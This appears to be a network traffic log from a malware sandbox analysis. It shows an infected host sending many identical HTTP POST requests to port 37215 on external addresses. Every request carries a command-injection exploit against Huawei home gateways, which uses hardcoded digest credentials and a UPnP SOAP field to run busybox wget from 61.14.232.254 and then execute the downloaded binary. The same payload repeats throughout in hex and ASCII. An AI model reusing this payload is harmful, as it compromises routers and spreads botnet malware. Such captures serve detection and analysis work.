3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1251192.168.2.1353442157.3.147.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531052113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1252192.168.2.1353040197.100.2.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531090021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1253192.168.2.1339434157.219.226.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531250954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1254192.168.2.1348696197.28.67.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531274080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1255192.168.2.1334266146.38.35.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531294107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1256192.168.2.1344332157.145.112.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531323910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1257192.168.2.135504841.36.180.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531361103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1258192.168.2.1358026157.33.201.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531470060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1259192.168.2.1341268197.238.15.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531497955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1260192.168.2.133516041.195.89.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531527996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1261192.168.2.133796041.110.164.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531560898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
